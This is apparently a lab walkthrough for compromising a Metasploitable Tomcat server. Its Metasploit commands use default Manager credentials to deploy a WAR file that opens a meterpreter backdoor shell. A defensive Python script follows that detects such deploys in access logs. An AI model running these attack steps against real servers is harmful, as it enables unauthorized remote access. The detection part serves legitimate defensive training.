Use the Tomcat Password for Penetration
After obtaining the Tomcat password from the corresponding module, we will use the password to penetrate the target machine. We will use the `exploit/multi/http/tomcat_mgr_deploy` module, which logs into the Tomcat Manager and executes a payload. This payload uploads a WAR package using the PUT operation, and this WAR package contains a JSP file that provides a meterpreter backdoor shell.
The attack module code:
- First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
- Search for the appropriate module:
search tomcat
- Then, select the appropriate attack module:
use exploit/multi/http/tomcat_mgr_deploy
- Use the `show` command to view the necessary parameters:
show options
- Set the target host address and the port to attack:
set rhost 192.168.122.102
- Set the port information:
set rport 8180
- Set the httpusername account name:
set httpusername tomcat
- Set the httppassword password:
set httppassword tomcat
- Then, perform the attack (this may take approximately one minute):
exploit
- Alright, we have now penetrated the target machine. Next, we will verify that the penetration succeeded. In the terminal where the attack succeeded, enter the command:
sysinfo
Do not enter `whoami`, as it will cause an error because the meterpreter payload used here does not support commands like `hostname`, `id`, `whoami`, etc. You can use the `help` command to see the commands it supports.
As shown below, it displays the operating system information:
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Architecture : x86
System Language : en_US
Meterpreter : java/linux
Press Ctrl+D to quit the Metasploit console, then start the inspection.
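From the defender's side, the WAR upload described above appears in the Tomcat access log as a PUT request to the Manager deploy endpoint. The following Python script is an added example, not part of the original lab: it assumes the AccessLogValve `common` log pattern, the `/manager/deploy` and `/manager/text/deploy` paths, and log lines constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed log format: Tomcat AccessLogValve "common" pattern  %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) \S+$'
)
# Manager deploy endpoint: /manager/deploy (older releases) or /manager/text/deploy (Tomcat 7+)
DEPLOY_PATH_RE = re.compile(r'^/manager/(?:text/)?deploy$')

def find_manager_deploys(lines):
    """Return one finding per PUT request to the Manager deploy endpoint."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "PUT":
            continue
        url = urlsplit(m["target"])
        if not DEPLOY_PATH_RE.match(url.path):
            continue
        status = int(m["status"])
        findings.append({
            "client": m["host"],
            "user": None if m["user"] == "-" else m["user"],
            "time": m["time"],
            # Context path the WAR was deployed under (the "path" query parameter)
            "context": parse_qs(url.query).get("path", ["?"])[0],
            "status": status,
            # The access log shows only that the request passed authentication;
            # the Manager's OK/FAIL response body is not recorded here.
            "authorized": status not in (401, 403),
        })
    return findings

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/2024:10:15:01 +0000] "GET /manager/html HTTP/1.1" 401 954
192.0.2.10 - - [12/Mar/2024:10:15:02 +0000] "PUT /manager/deploy?path=/example1 HTTP/1.1" 401 954
192.0.2.10 - tomcat [12/Mar/2024:10:15:03 +0000] "PUT /manager/deploy?path=/example1 HTTP/1.1" 200 58
192.0.2.20 - admin [12/Mar/2024:11:00:00 +0000] "GET /manager/list HTTP/1.1" 200 312
192.0.2.30 - deployer [12/Mar/2024:12:30:00 +0000] "PUT /manager/text/deploy?path=/shop&update=true HTTP/1.1" 200 61
""".splitlines()

if __name__ == "__main__":
    for finding in find_manager_deploys(SAMPLE_LOG):
        print(finding)
```

Each authorized finding is worth comparing against the list of expected deployments; an authorized PUT from an unexpected client or with an account such as `tomcat` indicates that Manager credentials need to be changed and the Manager application restricted.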